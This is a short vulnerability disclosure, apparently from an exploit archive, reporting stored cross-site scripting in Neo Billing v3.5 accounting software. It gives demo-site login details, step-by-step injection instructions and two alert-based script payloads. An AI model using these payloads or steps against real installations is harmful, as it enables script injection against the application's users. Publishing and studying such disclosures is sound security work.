[*] :: Title: Neo Billing - Accounting, Invoicing And CRM Software v3.5 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-26
[*] :: Software: Neo Billing - Accounting, Invoicing And CRM Software v3.5
[?] :: Technical Details & Description:
# Weak security measures like bad input fields data filtering has been discovered in the «Neo Billing - Accounting, Invoicing And CRM Software». Current version of this web-application is 3.5.
[?] :: Demo Website:
# Backend (admin): http://billing.ultimatekode.com/neo/autologin/?role=1
# Backend (user): http://billing.ultimatekode.com/neo/crm
# Login/Password (admin): email@example.com/123456
# Login/Password (user): firstname.lastname@example.org/123456
[!] :: Special Note:
# Payloads like sample #1 is not recommended to use because it will break a page u are working with. It's better to use payload based on the sample #2.
[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.
[+] :: PoC [Links]:
[+] :: PoC [Stored XSS Injection]:
# Authorize on the demo website for tests as admin or as a regular user, then go to any page with a text field, f.e. http://billing.ultimatekode.com/neo/productcategory/edit?id=13
# Click on «Edit» button and inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">